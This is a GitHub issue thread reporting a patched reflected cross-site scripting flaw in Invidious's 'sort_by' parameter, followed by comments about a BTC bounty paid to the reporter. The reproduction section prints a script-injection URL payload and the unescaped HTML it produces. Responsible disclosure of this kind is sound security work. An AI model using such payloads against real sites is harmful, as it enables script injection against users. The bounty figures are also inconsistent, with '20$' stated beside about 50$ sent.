### ISSUE TITLE
[Security Issue] CGI Generic XSS 

### ISSUE THREAD

**Issue by cysea** [iv-org/invidious#2733]
**Describe the bug**
Just a generic XSS vulnerability. This has been responsibly reported to the team and has been patched with [ddb06b0cac4c0b78e2e8e085791bce4c3a760625](https://github.com/iv-org/invidious/commit/ddb06b0cac4c0b78e2e8e085791bce4c3a760625)

**Steps to Reproduce**
```
+ The following resources may be vulnerable to cross-site scripting (quick test) :

+ The 'sort_by' parameter of the /channel/UChIs72whgZI9w6d6FhwGGHA/playlists CGI :

/channel/UChIs72whgZI9w6d6FhwGGHA/playlists?sort_by=%00"><script>alert(109)</script>

-------- output --------
<div class="pure-u-1 pure-md-1-3">

<a href="https://redirect.invidious.io/channel/UChIs72whgZI9w6d6FhwGGHA/
playlists?sort_by=%00"><script>alert(109)</script>">Switch Invidious Instance</a>

</div>
------------------------
```

**Kudos to the invidious team for such a quick response!**

**Comment by TheFrenchGhosty** [comment]
@cysea I would like to deeply thank you a lot for reporting this problem!

Considering this has been the biggest security issue Invidious ever had, and considering that it was disclosed reponsibly, I and most of the organization members would like to reward you with 50$ (in BTC) If you want to receive your reward feel free to send me your BTC address or post it directly here.

Every payment will be, as usual, reflected in the [transparency repository](https://github.com/iv-org/transparency), in our monthly financial reports.

**Comment by cysea** [comment]
That's quite a generous bounty reward. 
Thank you and props to the entire Invidious team once again!

A toast to getting one step closer of accomplishing our goal, which is putting the world wide web back into the hands of the people! 🥂

**Comment by TheFrenchGhosty** [comment]
A 20$ bounty has been rewarded to @cysea for this report.

Transaction (b9a509b8e2c49fb410681d0ec007c12188466dd4c7f64161301d3ab41213e265):

Amount sent: 0.00103 BTC (~44.48€ or ~50$)

Mining fees (10 sat/byte): 0.00001426 BTC (~0.62€)
